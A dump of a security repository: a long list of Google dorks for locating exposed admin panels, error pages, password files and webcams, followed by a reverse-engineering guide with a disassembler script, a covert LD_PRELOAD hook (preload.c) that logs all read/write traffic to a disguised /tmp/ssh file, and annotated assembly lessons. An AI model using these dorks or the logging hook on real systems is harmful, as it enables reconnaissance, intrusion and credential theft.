“Warning: Division by zero in” “on line” -forum
“Warning: mysql_connect(): Access denied for user: *@*” “on line” -help -forum
“Warning: mysql_query()” “invalid query”
“Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL”
“Warning: Supplied argument is not a valid File-Handle resource in”
“Warning:” “failed to open stream: HTTP request failed” “on line”
“Warning:” “SAFE MODE Restriction in effect.” “The s?ri?t whose uid is” “is not allowed to access owned by uid 0 in” “on line”
“SQL Server Driver][SQL Server]Line 1: Incorrect syntax near”
An unexpected token “END-OF-STATEMENT” was found
Coldfusion Error Pages
filetype:asp + “[ODBC SQL”
filetype:asp “Custom Error Message” Category Source
filetype:log “PHP Parse error” | “PHP Warning” | “PHP Error”
filetype:php inurl:”logging.php” “Discuz” error
ht://Dig htsearch error
IIS 4.0 error messages
IIS web server error messages
Internal Server Error
intext:”Error Message : Error loading required libraries.”
intext:”Warning: Failed opening” “on line” “include_path”
intitle:”Apache Tomcat” “Error Report”
intitle:”Default PLESK Page”
intitle:”Error Occurred While Processing Request” +WHERE (SELECT|INSERT) filetype:cfm
intitle:”Error Occurred” “The error occurred in” filetype:cfm
intitle:”Error using Hypernews” “Server Software”
intitle:”Execution of this s?ri?t not permitted”
intitle:”Under construction” “does not currently have”
intitle:Configuration.File inurl:softcart.exe
MYSQL error message: supplied argument….
mysql error with query
Netscape Application Server Error page
ORA-00921: unexpected end of SQL command
ORA-00921: unexpected end of SQL command
ORA-00936: missing expression
PHP application warnings failing “include_path”
sitebuildercontent
sitebuilderfiles
sitebuilderpictures
Snitz! forums db path error
SQL syntax error
Supplied argument is not a valid PostgreSQL result
warning “error on line” php sablotron
Windows 2000 web server error messages
“ftp://” “www.eastgame.net”
“html allowed” guestbook
: vBulletin Version 1.1.5″
“Select a database to view” intitle:”filemaker pro”
“set up the administrator user” inurl:pivot
“There are no Administrators Accounts” inurl:admin.php -mysql_fetch_row
“Welcome to Administration” “General” “Local Domains” “SMTP Authentication” inurl:admin
“Welcome to Intranet”
“Welcome to PHP-Nuke” congratulations
“Welcome to the Prestige Web-Based Configurator”
“YaBB SE Dev Team”
“you can now password” | “this is a special page only seen by you. your profile visitors” inurl:imchaos
(“Indexed.By”|”Monitored.By”) hAcxFtpScan
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
allinurl:”index.php” “site=sglinks”
allinurl:install/install.php
allinurl:intranet admin
filetype:cgi inurl:”fileman.cgi”
filetype:cgi inurl:”Web_Store.cgi”
filetype:php inurl:vAuthenticate
filetype:pl intitle:”Ultraboard Setup”
Gallery in configuration mode
Hassan Consultings Shopping Cart Version 1.18
intext:”Warning: * am able * write ** configuration file” “includes/configure.php” -
intitle:”Gateway Configuration Menu”
intitle:”Horde :: My Portal” -”[Tickets”
intitle:”Mail Server CMailServer Webmail” “5.2″
intitle:”MvBlog powered”
intitle:”Remote Desktop Web Connection”
intitle:”Samba Web Administration Tool” intext:”Help Workgroup”
intitle:”Terminal Services Web Connection”
intitle:”Uploader Uploader v6″ -pixloads.com
intitle:osCommerce inurl:admin intext:”redistributable under the GNU” intext:”Online Catalog” -demo -site:oscommerce.com
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
intitle:phpMyAdmin “Welcome to phpMyAdmin ***” “running on * as root@*”
inurl:”/NSearch/AdminServlet”
inurl:”index.php? module=ew_filemanager”
inurl:aol*/_do/rss_popup?blogID=
inurl:footer.inc.php
inurl:info.inc.php
inurl:ManyServers.htm
inurl:newsdesk.cgi? inurl:”t=”
inurl:pls/admin_/gateway.htm
inurl:rpSys.html
inurl:search.php vbulletin
inurl:servlet/webacc
natterchat inurl:home.asp -site:natterchat.co.uk
XOOPS Custom Installation
inurl:htpasswd filetype:htpasswd
inurl:yapboz_detay.asp + View Webcam User Accessing
allinurl:control/multiview
inurl:”ViewerFrame?Mode=”
intitle:”WJ-NT104 Main Page”
inurl:netw_tcp.shtml
intitle:”supervisioncam protocol”

BIN
src/Security/Technical Papers and Notes/Docs/The Neophyte's Guide To Hacking.odt Executable file
View File

Binary file not shown.

BIN
src/Security/Technical Papers and Notes/PDFs/Blue Team Cheat sheet.pdf Normal file
View File

Binary file not shown.

BIN
src/Security/Technical Papers and Notes/PDFs/RSA - Theory and Implementation.pdf Normal file
View File

Binary file not shown.

BIN
src/Security/Technical Papers and Notes/PDFs/Reverse Engineering Malware.pdf Normal file
View File

Binary file not shown.

8
src/Security/Technical Papers and Notes/Reverse Engineering Guide/code/constructor.c Normal file
View File

@@ -0,0 +1,8 @@
#include <stdio.h>
int _my_begin() __attribute__((constructor));
int _my_begin()
{
printf("Hi. I live at 0x%x Computer St.\n", &_my_begin);
}

271
src/Security/Technical Papers and Notes/Reverse Engineering Guide/code/disasm.pl.txt Normal file
View File

@@ -0,0 +1,271 @@
#!/usr/bin/perl -w
# Disasm.pl v0.4
#Assumes that the file we're working with is stripped
#TODO:
# 0. Sort NUMERICALLY on function call names, not lexographically
# 1. Get this to work if symbols are present
# 2. Add options or speed up the finding of unused functions (can we do it
# without an extra pass?)
# 3. Fix various FIXME's
# 4. Make work with sparc
use strict;
use Getopt::Long;
my ($call_graph, $fnames);
if($#ARGV < 0)
{
print "Usage: $0 <file> [options]\n";
print "\t--fnames\tprint function names\n";
print "\t--graph\tgenerate file with graph information for dot\n";
exit 1;
} else {
$call_graph = $fnames = 0;
GetOptions( "fnames" => \$fnames, # --fnames
"graph" => \$call_graph # --graph
);
}
my %symbols;
my $fprefix = "function #";
my $lprefix = "label #";
my $return = "ret ";
my $call = "call 0x";
my $jump = "j.. 0x";
my $retsize = 1; #size of ret opcode
#Sparc:
#FIXME: There's a few issues with sparc opcodes:
# 1. We need to handle command line options to specify to use sparc
# 2. We need to allow arbitrary spacing after the branch instruction
# 3. Some functions return with just ret, some return with ret then restore
my $sreturn = "restore";
my $scall = "call ";
my $sjump = " b[^t0-9].[^O-9a-f].[ ]*";
my $sparc = `uname -a` =~ /sparc/;
if($sparc)
{
$return = $sreturn;
$call = $scall;
$jump = $sjump;
}
my $filename = shift(@ARGV);
my @lines = `objdump -TC $filename`;
my %functions;
my %labels;
my %calls;
foreach (@lines)
{
if(/0([0-9a-f]+).*\*UND\*.* ([^ ]+)$/)
{
my $temp = $2;
chop $temp;
$symbols{$1} = $temp;
}
}
@lines = `objdump -dj .text $filename`;
#counters for functions, unused functions, and labels
my $fcount = 1;
my $lcount = 1;
foreach(@lines)
{
#FIXME: Hack that also assumes stripped binary.. How can we factor this
#out of the loop?
if(/([0]+)([0-9a-f]+)\ <.text>/)
{
# print "Text @ $1 $2 ($_)";
$symbols{$2} = "_start";
$functions{$2} = "_start";
}
if(/$call([0-9a-f]+)/ &&
! exists($symbols{$1}))
# if(/([0-9a-f]+).*$function/)
{
$symbols{$1} = "$fprefix$fcount";
$fcount++;
$functions{$1} = $symbols{$1};
}
elsif(/$jump([0-9a-f]+)/ &&
! exists($symbols{$1}))
{
$symbols{$1} = "$lprefix$lcount";
$lcount++;
$labels{$1} = $symbols{$1};
}
}
#FIXME: This should be an option...
#
# Nasko - should it? misses some data in the output just uncomment the if
# statement and the corresponding closing brace to make --fnames work
#
my $inFunc;
my $lastRet;
my $storeRet = 0;
my $counter = 0;
# if ($fnames == 1) {
foreach(@lines)
{
++$counter;
#HACK: Yeah, this sucks.. but we can't just add 1 to get the next address
#and I don't know how to peek at the next line
#
# Nasko - just use $lines[$counter]
#
if($storeRet == 1)
{
if(/([0-9a-f]+)/)
{
$lastRet = $1;
$storeRet = 0;
}
else
{
next;
}
}
if(/([0-9a-f]+)/ and exists($functions{$1}))
{
$inFunc = 1;
}
elsif(/([0-9a-f]+).*$return/)
{
if($inFunc == 0)
{
$symbols{$lastRet} = "function #$fcount (unused)";
$functions{$lastRet} = "function #$fcount (unused)";
$fcount++;
}
#FIXME: Sure would be nice to peek at the next line and set lastRet
#right here..
$storeRet = 1;
$inFunc = 0;
}
}
#}
my $localFunc;
foreach(@lines)
{
if(/([0-9a-f]+)/ and exists($symbols{$1}))
{
my $symb = $symbols{$1};
if ($symb =~ /label/) {
$_ = "$symb:\n$_";
} else {
$_ = "\n$symb:\n$_";
$localFunc = $symb;
}
}
elsif(/.*$return/)
{
$_ .= "return\n\n";
}
elsif(/.*$jump([0-9a-f]+)/ ||
/.*$call([0-9a-f]+)/)
{
chop;
if(exists($symbols{$1}))
{
$_ .= "\t<" . $symbols{$1} . ">\n";
}
else
{
$_ .= "\t<unknown symbol>\n";
}
my $symb = $symbols{$1};
# Why skip labels??
# if ($symb =~ /label/) {
# next;
# }
if(exists($calls{ $localFunc }))
{
push @{$calls{ $localFunc } }, $symb;
}
else
{
$calls{ $localFunc } = [ $symb ];
}
}
print;
}
print "\nKnown symbols:\n";
foreach (sort (keys %symbols))
{
if (!($symbols{$_} =~ /label/))
{
print;
print ": $symbols{$_}\n";
}
}
print "\nCall graph:\n";
my $fName;
if ($call_graph == 1) {
# a local variable for each function name
# open the file to store the definition of the graph
open(FILE, ">call_graph") ||
die "Couldn't open file for writing the call graph\n";
print FILE "digraph prof {\n";
}
#foreach (sort keys %calls)
foreach (%calls)
{
$fName = $_;
print;
print ":\n";
foreach (@{ $calls{$_} })
{
my $mytmp = $_;
if(!($_ =~ /label/))
{
print " calls $_\n";
# print to the graph file
if($call_graph == 1) {print FILE "\t\"$fName\" -> \"$_\"\n"};
}
}
print "\n";
}
if ($call_graph == 1) {
# put the closing brace and close the file
print FILE "}\n";
close(FILE);
}

100
src/Security/Technical Papers and Notes/Reverse Engineering Guide/code/preload.c Normal file
View File

@@ -0,0 +1,100 @@
#include <dlfcn.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#define read old_read
# define write old_write
# include <unistd.h>
# undef read
#undef write
// #define DEBUG
#define OUTFILE "/tmp/ssh-CrLvXXXXXX"
//#define NEW_SESSION "-------------------------------\nNew Session:\n-----"
#define NEW_SESSION ""
typedef int (*fd_ptr_t)(int, void *, int);
static void *handle = NULL;
static int outfd = 0;
static fd_ptr_t read_ptr;
static fd_ptr_t write_ptr;
void init_dl()
{
char template[] = OUTFILE;
if(!handle)
{
if((handle = dlopen("/lib/libc.so.6", RTLD_LAZY)) == NULL)
{
printf("%s\n", dlerror());
exit(1);
}
if((read_ptr = dlsym(handle, "read")) == NULL)
{
printf("%s\n", dlerror());
exit(1);
}
if((write_ptr = dlsym(handle, "write")) == NULL)
{
printf("%s\n", dlerror());
exit(1);
}
if((outfd = mkstemp(template)) == -1)
{
#ifdef DEBUG
perror("Outfile");
fprintf(stderr, "Templ: %s\n", template);
#endif
}
write(outfd, NEW_SESSION, strlen(NEW_SESSION));
}
}
int read(int fd, void *buf, int len)
{
int read_len;
#ifdef DEBUG
fprintf(stderr, "read = 0x%x, read(%d,0x%x,%d);\n", read_ptr, fd, buf, len);
#endif
init_dl();
read_len = read_ptr(fd, buf, len);
if(read_len > 0)
write_ptr(outfd, buf, read_len);
return read_len;
}
int write(int fd, void *buf, int len)
{
int write_len;
#ifdef DEBUG
fprintf(stderr, "read = 0x%x, read(%d,0x%x,%d);\n", read_ptr, fd, buf, len);
#endif
init_dl();
write_len = write_ptr(fd, buf, len);
if(write_len > 0)
write_ptr(outfd, buf, write_len);
return write_len;
}
#ifdef DEBUG
int main()
{
char buf[80];
read(STDIN_FILENO, buf, sizeof(buf)-1);
return 0;
}
#endif

88
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-char-O0.s Normal file
View File

@@ -0,0 +1,88 @@
.file "array-stack-char.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "hello there, govna!"
.text
.align 4
.globl charArray
.type charArray,@function
charArray:
pushl %ebp
movl %esp,%ebp
/* Subtract enough space for the array and then some. Such large stack
* allocations are a HUGE clue that somebody is working with arrays on
* the stack. */
subl $520,%esp
/* mystery arg to strncpy */
addl $-4,%esp
/* This line is perplexing at first, but scan down. Its the length
* argument to strncpy. This gives us the hint that GCC allocated 8
* extra bytes on the stack */
pushl $511
/* string to copy */
pushl $.LC0
/* address of the buffer to copy into */
leal -512(%ebp),%eax
pushl %eax
call strncpy
/* Post-call stack adjust */
addl $16,%esp
/* more mystery args */
addl $-12,%esp
/* Strlen */
pushl $.LC0
call strlen
/* stack ajust */
addl $16,%esp
/* Return value transfer (unoptimized) */
movl %eax,%eax
/* put address of string into edx */
leal -512(%ebp),%edx
movb $0,(%eax,%edx)
/*
Recall: disp(%base, %index, scale) = disp + %base + %index*scale.
In this case, base and scale were omitted, so we have the address
%eax + %edx. (Scale is assumed to be one). Since %eax contains the
return value from strlen, we are doing string[strlen(.LC0)] = 0.
In otherwords, we are null terminating the string, in case the
strncpy call failed to copy everything. Think about this for a
minute. This is a bug. Can you see why?
Answer: If the strncpy call failed, LESS than .LC0 would have been
copied because there wasn't enough room! Hence this is a bug that we have discovered through painstaking analysis of the assembly that the
author of the C code overlooked! (To those of you who worry this may
be a contrived example, I wrote the .c file, and didn't notice this
bug until looking at the assembly just now).
Techniques to use bugs like this to our advantage will be discussed
later, in the buffer overflow chapter.
*/
/* mystery arg */
addl $-12,%esp
leal -512(%ebp),%eax
pushl %eax
/*
printArray is a bogus function that we call simply to prevent the
optimizer from optimizing away all our code in future examples.
*/
call printArray
addl $16,%esp
.L2:
leave
ret
.Lfe1:
.size charArray,.Lfe1-charArray
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

31
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-char-O2.s Normal file
View File

@@ -0,0 +1,31 @@
.file "array-stack-char.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "hello there, govna!"
.text
.align 4
.globl charArray
.type charArray,@function
charArray:
pushl %ebp
movl %esp,%ebp
subl $532,%esp
pushl %ebx
addl $-4,%esp
pushl $511
pushl $.LC0
leal -512(%ebp),%ebx
pushl %ebx
call strncpy
movb $0,-493(%ebp)
addl $-12,%esp
pushl %ebx
call printArray
movl -536(%ebp),%ebx
leave
ret
.Lfe1:
.size charArray,.Lfe1-charArray
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

30
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-char-full.s Normal file
View File

@@ -0,0 +1,30 @@
.file "array-stack-char.c"
.version "01.01"
gcc2_compiled.:
.section .rodata
.LC0:
.string "hello there, govna!"
.text
.align 4
.globl charArray
.type charArray,@function
charArray:
subl $536,%esp
pushl %ebx
addl $-4,%esp
pushl $511
pushl $.LC0
leal 28(%esp),%ebx
pushl %ebx
call strncpy
movb $0,51(%esp)
addl $-12,%esp
pushl %ebx
call printArray
addl $32,%esp
popl %ebx
addl $536,%esp
ret
.Lfe1:
.size charArray,.Lfe1-charArray
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

13
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-char.c Normal file
View File

@@ -0,0 +1,13 @@
#include <stdio.h>
void charArray()
{
char buf[512];
strncpy(buf, "hello there, govna!", sizeof(buf)-1);
buf[strlen("hello there, govna!")] = 0;
printArray(buf);
}

74
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int1D-O0.s Normal file
View File

@@ -0,0 +1,74 @@
.file "array-stack-int1D.c"
.version "01.01"
gcc2_compiled.:
.text
.align 4
.globl intArray
.type intArray,@function
intArray:
pushl %ebp
movl %esp,%ebp
/* Woah thats a lot of space */
subl $2072,%esp
/* nop is a Null OPeration. It does nothing but padd our instruction
* space */
nop
/* Set some variable var1 to zero. (Keep track of it on your stack
* sheet!) */
movl $0,-2052(%ebp)
/* alignment noise */
.p2align 4,,7
.L3:
/* Scanning ahead, we see what looks like it could be a loop: Double
* jump, label here, label after comparason.. */
/* Recall: "Jump if -2052(%ebp) le $511" */
cmpl $511,-2052(%ebp)
jle .L7
/* if var1 > 511, exit loop */
jmp .L5
.p2align 4,,7
.L6:
/* put var1 in eax */
movl -2052(%ebp),%eax
movl %eax,%edx
/* Here we see our indexing operation begin:
Place var1*4 into %eax */
leal 0(,%edx,4),%eax
/* place the address of some nicely aligned quantity into %edx
(A large array, perhaps?) */
leal -2048(%ebp),%edx
/* Place var1 into ecx */
movl -2052(%ebp),%ecx
/* *(%eax + %edx) = %ecx; -> array1[var1] = var1
(because %eax = var1*4 */
movl %ecx,(%eax,%edx)
.L5:
/* var1++ */
incl -2052(%ebp)
/* loop */
jmp .L4
.p2align 4,,7
.L4:
/* Printarray call to prevent over-optimization */
addl $-12,%esp
leal -2048(%ebp),%eax
pushl %eax
call printArray
addl $16,%esp
.L2:
leave
ret
.Lfe1:
.size intArray,.Lfe1-intArray
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

55
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int1D-O2.s Normal file
View File

@@ -0,0 +1,55 @@
.file "array-stack-int1D.c"
.version "01.01"
gcc2_compiled.:
.text
.align 4
.globl intArray
.type intArray,@function
intArray:
pushl %ebp
movl %esp,%ebp
/* A whole lot of stack space is clue to an array */
subl $2056,%esp
/* leals are clue to the fact that we are going to be doing some more
* indexing in the future. From this its save to assume that -2048
* down from %ebp is our array, and local variables are after it. */
leal -2048(%ebp),%edx
movl $511,%ecx
/* Here is the top of our array */
leal -4(%ebp),%eax
.p2align 4,,7
.L21:
/* *%eax = %ecx;.. Note: 32bit integer operation */
movl %ecx,(%eax)
/* move %eax down by 4. We are now sure we're dealing with ints here */
addl $-4,%eax
/* Decrement counter */
decl %ecx
/* JNS means jump if not signed, ie if the result of the previous
* instruction was not negative. So jump if %ecx >= 0 */
jns .L21
/* So can you predict the results of the following imaginary
* printArray call? Our resulting code is a bit different than
* the original code. Instead of running the loop forwards, the
* optimizer has decided that we should start at index 511, and run
* backwards until %ecx < 0. So the array is still numbered 0..511, we
* just did it in reverse. Pretty strange optimization, eh?
*/
addl $-12,%esp
pushl %edx
call printArray
leave
ret
.Lfe1:
.size intArray,.Lfe1-intArray
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

27
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int1D-full.s Normal file
View File

@@ -0,0 +1,27 @@
.file "array-stack-int1D.c"
.version "01.01"
gcc2_compiled.:
.text
.align 4
.globl intArray
.type intArray,@function
intArray:
subl $2060,%esp
movl %esp,%edx
movl $511,%ecx
leal 2044(%esp),%eax
.p2align 4,,7
.L21:
movl %ecx,(%eax)
addl $-4,%eax
decl %ecx
jns .L21
addl $-12,%esp
pushl %edx
call printArray
addl $16,%esp
addl $2060,%esp
ret
.Lfe1:
.size intArray,.Lfe1-intArray
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

14
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int1D.c Normal file
View File

@@ -0,0 +1,14 @@
#include <stdio.h>
void intArray()
{
int buf[512];
int i;
for(i = 0; i < 512; i++)
buf[i] = i;
printArray(buf);
}

171
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int2D-O0.s Normal file
View File

@@ -0,0 +1,171 @@
.file "array-stack-int2D.c"
.version "01.01"
gcc2_compiled.:
.text
.align 4
.globl intArray2D
.type intArray2D,@function
intArray2D:
pushl %ebp
movl %esp,%ebp
/* Lots of stack space.. Clue that we're working with arrays */
subl $424,%esp
nop
/* Give -404(%ebp) the label var1 on your stack sheet, set it 0 */
/* This also gives us a bound on the total array size.. Most likely
* they specified the array first, then the vars */
movl $0,-404(%ebp)
.p2align 4,,7
.L3:
/* Uh oh.. a loop! */
/* "Jump if var1 le 9" -> Loop while var1 <= 9 */
cmpl $9,-404(%ebp)
jle .L6
jmp .L4
.p2align 4,,7
.L6:
/* Lable this space var2 */
movl $0,-408(%ebp)
.p2align 4,,7
.L7:
/* Hrmm.. could this be a nested loop? YEP! */
/* "Loop while var2 <= 9" */
cmpl $9,-408(%ebp)
jle .L10
jmp .L5
.p2align 4,,7
.L10: /* Loop body */
/* move var1 to eax */
movl -404(%ebp),%eax
/* Jump if var2 ne var1 */
cmpl -408(%ebp),%eax
jne .L11
/* Code executed if (var2 == var1) */
/* Put var2 into eax */
movl -408(%ebp),%eax
movl %eax,%edx
/* Indexing operation coming! (%eax = var2*4*/
leal 0(,%edx,4),%eax
/* put var1 into ecx, then edx */
movl -404(%ebp),%ecx
movl %ecx,%edx
/* The sal instruction bitshifts the operand left by the specified
* number. It is basically a faster way of multiplying by powers of 2.*/
/* %edx *= 4; (edx = var1*4)*/
sall $2,%edx
/* %edx = var1 * 5 */
addl %ecx,%edx
/* %ecx = var1 * 5 * 8 = var1 * 40 (hrmm.. 40 is 10*4... coincidence?)*/
leal 0(,%edx,8),%ecx
/* %eax = var1*40 + var2*4 */
addl %ecx,%eax
/* Put the base of the array into %edx */
leal -400(%ebp),%edx
/* put 1 into the address %eax + %edx. You see that gcc likes to use
* the base and index backwards if there is no scale.. Lord only knows..
*
* The important thing to notice is that we have stored a 1 at memory
* location array + var1*40 + var2*4, and we have done it HORRIBLY
* inefficiently! (A human should have been able to do this with 2
* leals and an add).
*
* Why 40 and 4? Well, recall that 2D arrays on the
* stack of the form 'type array[dim2][dim1];'
* are represented by a single array of size type*dim1*dim2. So
* visualize long array as being divided into rows now (like text that
* wraps around the screen). To get to the var1 row, we have to go past
* var1*dim1*type cells, and to get to the var2 column, we have to add
* on var2*type cells. Thus array[var1][var2] is
*
* array + var1*dim1*type + var2*type.
*/
movl $1,(%eax,%edx)
jmp .L9
.p2align 4,,7
.L11:
/* Else clause to if(var2 == var1) */
/* put var2 into eax */
movl -408(%ebp),%eax
movl %eax,%edx
/* eax now has var2*4 */
leal 0(,%edx,4),%eax
/* ecx has var1 */
movl -404(%ebp),%ecx
movl %ecx,%edx
/* edx = var1*4 */
sall $2,%edx
/* edx = var1*5 (because ecx = var1) */
addl %ecx,%edx
/* ecx = var1*40 */
leal 0(,%edx,8),%ecx
/* eax = var1*40 + var2*4 */
addl %ecx,%eax
/* Base of our array in edx */
leal -400(%ebp),%edx
/* put the zero in eax */
movl $0,(%eax,%edx)
.L12:
.L9:
/* var2++ */
incl -408(%ebp)
jmp .L7
.p2align 4,,7
.L8:
.L5:
/* var1++ */
incl -404(%ebp)
jmp .L3
.p2align 4,,7
.L4:
/* So, can you visualize what this code is doing based on the assembly
* we just went through without reverting back to the C code?
* What does the 2D array look like after the program is done? Can you
* draw it in 2D? How about in 1D? How about on the stack? (recall it
* is on the stack) */
/* Answer:
So let's summarize:
We have an outer loop that is iterating over var1 until it hits 10
We have an inner loop that is iterating over var2 until it hits 10
The inner loop sets array[var1][var2] to 1 if var1 == var2
else it sets array[var1][var2] to 0.
So can you draw the array now?
*/
addl $-12,%esp
leal -400(%ebp),%eax
pushl %eax
call printArray
addl $16,%esp
.L2:
leave
ret
.Lfe1:
.size intArray2D,.Lfe1-intArray2D
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

89
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int2D-O2.s Normal file
View File

@@ -0,0 +1,89 @@
.file "array-stack-int2D.c"
.version "01.01"
gcc2_compiled.:
.text
.align 4
.globl intArray2D
.type intArray2D,@function
intArray2D:
pushl %ebp
movl %esp,%ebp
/* Huge allocation. Must be an array */
subl $412,%esp
/* preserve registers */
pushl %edi
pushl %esi
pushl %ebx
/* %ebx = 0 */
xorl %ebx,%ebx
/* Think about where -400(%ebp) is on the stack, and how it is
* aligned. The fact that it is such a nice number really suggests
* that we have the bottom of an array here
* %eax = array */
leal -400(%ebp),%eax
/* So this is kind of odd.. the pointer to the bottom of array is
* being stored on the stack. Just make a note of it and move on. */
movl %eax,-404(%ebp)
movl %eax,%edi
.p2align 4,,7
.L21:
/* %ecx = 0 */
xorl %ecx,%ecx
/* %edx = %ebx*4 */
leal 0(,%ebx,4),%edx
/* %esi = %ebx + 1 */
leal 1(%ebx),%esi
/* %eax = %ebx + %edx = %ebx*5 */
leal (%ebx,%edx),%eax
/* %eax = %eax*8 = %ebx*40 */
sall $3,%eax
/* %edx = %ebx*40 + %ebx*4 */
addl %eax,%edx
/* %eax = %ebx*40 + array */
addl %edi,%eax
.p2align 4,,7
.L25:
/* if(%ebx != %ecx) jump */
cmpl %ecx,%ebx
jne .L26
/* code executed if(%ebx = %ecx) */
/* array + %edx = 1 */
movl $1,(%edx,%edi)
jmp .L24
.p2align 4,,7
.L26:
movl $0,(%eax)
.L24:
addl $4,%eax
incl %ecx
cmpl $9,%ecx
jle .L25
movl %esi,%ebx
cmpl $9,%ebx
jle .L21
addl $-12,%esp
movl -404(%ebp),%eax
pushl %eax
call printArray
leal -424(%ebp),%esp
popl %ebx
popl %esi
popl %edi
leave
ret
.Lfe1:
.size intArray2D,.Lfe1-intArray2D
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

55
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int2D-full.s Normal file
View File

@@ -0,0 +1,55 @@
.file "array-stack-int2D.c"
.version "01.01"
gcc2_compiled.:
.text
.align 4
.globl intArray2D
.type intArray2D,@function
intArray2D:
subl $412,%esp
pushl %ebp
pushl %edi
pushl %esi
pushl %ebx
xorl %ebx,%ebx
leal 16(%esp),%ebp
movl %ebp,%edi
.p2align 4,,7
.L21:
xorl %ecx,%ecx
leal 0(,%ebx,4),%edx
leal 1(%ebx),%esi
leal (%ebx,%edx),%eax
sall $3,%eax
addl %eax,%edx
addl %edi,%eax
.p2align 4,,7
.L25:
cmpl %ecx,%ebx
jne .L26
movl $1,(%edx,%edi)
jmp .L24
.p2align 4,,7
.L26:
movl $0,(%eax)
.L24:
addl $4,%eax
incl %ecx
cmpl $9,%ecx
jle .L25
movl %esi,%ebx
cmpl $9,%ebx
jle .L21
addl $-12,%esp
pushl %ebp
call printArray
addl $16,%esp
popl %ebx
popl %esi
popl %edi
popl %ebp
addl $412,%esp
ret
.Lfe1:
.size intArray2D,.Lfe1-intArray2D
.ident "GCC: (GNU) 2.95.4 (Debian prerelease)"

20
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int2D.c Normal file
View File

@@ -0,0 +1,20 @@
#include <stdio.h>
void intArray2D()
{
int buf[10][10];
int i, j;
for(i = 0; i < 10; i++)
{
for(j = 0; j < 10; j++)
{
if(i == j)
buf[i][j] = 1;
else
buf[i][j] = 0;
}
}
printArray(buf);
}

182
src/Security/Technical Papers and Notes/Reverse Engineering Guide/examples/UnderstandingAsm/arrays/stack/array-stack-int3D-O0.s Normal file
View File

@@ -0,0 +1,182 @@
.file "array-stack-int3D.c"
.version "01.01"
gcc2_compiled.:
.text
.align 4
.globl intArray3D
.type intArray3D,@function
intArray3D:
pushl %ebp
movl %esp,%ebp
/* Woah thats a lot of memory */
subl $1224,%esp
nop
/* Set var1 = 0 */
movl $0,-1204(%ebp)
.p2align 4,,7
.L3:
/* While(var1 <= 2) */
cmpl $2,-1204(%ebp)
jle .L6
jmp .L4
.p2align 4,,7
.L6:
/* set var2 = 0 */
movl $0,-1208(%ebp)
.p2align 4,,7
.L7:
/* While(var2 <= 9) */
cmpl $9,-1208(%ebp)
jle .L10
jmp .L5
.p2align 4,,7
.L10:
/* Set var3 = 0 */
movl $0,-1212(%ebp)
.p2align 4,,7
.L11:
/* While(var3 <= 9) */
cmpl $9,-1212(%ebp)
jle .L14
jmp .L9
.p2align 4,,7
.L14:
/* var2 -> eax */
movl -1208(%ebp),%eax
/* if(var2 != var3) then jump*/
cmpl -1212(%ebp),%eax
jne .L15
/* code executed if(var2 == var3) */
/* place var3 in eax */
movl -1212(%ebp),%eax
movl %eax,%edx
/* eax = var3 *4 */
leal 0(,%edx,4),%eax
/* place var2 in ecx */
movl -1208(%ebp),%ecx
movl %ecx,%edx
/* edx = var2*4 */
sall $2,%edx
/* edx = var2*5 */
addl %ecx,%edx
/* ecx = var2*40 */
leal 0(,%edx,8),%ecx
/* eax = var2*40 + var3 * 4 */
addl %ecx,%eax
/* ecx = var1 */
movl -1204(%ebp),%ecx
movl %ecx,%edx
/* edx = var1*4 */
sall $2,%edx
/* edx = var1*5 */
addl %ecx,%edx
/* ecx = var1*20 */
leal 0(,%edx,4),%ecx
/* edx = var1*25 */
addl %ecx,%edx
movl %edx,%ecx
/* ecx = var1*25*16 = var1*100*4 = var1*400 */
sall $4,%ecx
/* eax = var1*400 + var2*40 + var3*4 */
addl %ecx,%eax
/* edx = base of array */
leal -1200(%ebp),%edx
/* ecx = var1 */
movl -1204(%ebp),%ecx
/* set *(array + var1*400 + var2*40 + var3*4) = var1.
* So: array[var1][var2][var3] = var1;
*
* Can we guess the dimensions of our array at this point yet?
*
* From the formula given, 400 = dim2*dim1*type, 40 = dim1*type,
* 4=type.
*
* So type is int, dim1 is 10, dim2 is 10, dim3 is unknown.
* For a hint at dim3, what does the loop iterate var1 over?
* It executes so long as var1 <= 2. So our array is probably declared
* as:
* int array[3][10][10];
*/
movl %ecx,(%eax,%edx)
jmp .L13
.p2align 4,,7
.L15:
/* else clause for if(var2 == var3) */
/* this is pretty much the same code as above.. with one exception.. */
movl -1212(%ebp),%eax
movl %eax,%edx
leal 0(,%edx,4),%eax
movl -1208(%ebp),%ecx
movl %ecx,%edx
sall $2,%edx
addl %ecx,%edx
leal 0(,%edx,8),%ecx
addl %ecx,%eax
